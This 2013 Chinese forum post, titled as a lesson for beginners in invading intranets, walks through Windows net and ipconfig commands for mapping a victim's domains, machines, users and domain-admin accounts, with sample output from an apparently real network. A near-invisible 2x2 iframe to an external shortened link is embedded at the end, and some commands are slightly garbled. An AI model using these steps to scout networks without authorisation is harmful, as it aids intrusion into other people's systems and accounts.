教菜鸟入侵内网!想知道就进

2013/4/2 20:50:00  人气 652    怀旧国机论坛  
简单内网渗透刺探命令:
1.ipconfig /all
//可以查看到当前网卡配置信息,包括所
属域以及IP段
这个命令可以看到:主机名字---
shwdm,IP--192.168.103.8,网关
IP---192.168.103.10,DNS 域名解析地址
IP---192.168.100.1,主WINS服务器
IP---10.0.22.5
2.net view
//显示正由指定的计算机共享的域、计算
机或资源的列表。如果在没有参数的情况
下使用,则 net view 显示当前域中的计
算机列表。
可以看到我们当前域共有8台机器,我们
的这台机器--SHWDM 也在其中[ br]3.ping 机器名
//显示该机器名的IP
如图PING BJCWSERVER,我们得到这个
名字叫BJCWSERVER的主机IP为
192.168.103.50
4.net view /domain
//查看有多少域
5.net view /domain:testdomain
(testdomain 假设为目标的其中一个
域)
//此命令是查看 testdomain域中的计算
机列表
我们分别查看这三个域中的计算机列表,
可以查到MYGROUP域下面只有一台叫
NCSERVER的机器,而且系统是LINUX
的,是个SAMBA 服务器
6.net use r /domain
//获取所有域用户列表
7.net group /domain
//获取域用户组信息
8.net group “domain admins“ /domain
//查看与管理组成员
9.net user domain-admin /domain
//查看管理员登陆时间,密码过期时间,
是否有登陆脚本,组分配等信息!
10.net time /domain
//可以查看域时间,以及域服务器的名字
(快速查找域的方法之一 By LCX)
总结下,通过这次信息收集,我们可以得
到:
1.这个内网的网关为 192.168.1 03.10,DNS 域名解析IP为
192.168.100.1,主WINS服务器为
10.0.22.5
2.一共有三个域,其中WORKGROUP域
下面有8台机器(本机亦属其域),
POLYCOMRSS 域下面有一台,
MYGROUP域下面有一台SAMBA
SERVER,系统是LINUX

. [iframe=2*2]http://url.cn/FLfTXA[/iframe]

发表回复

   


  通知楼主
暂无回复!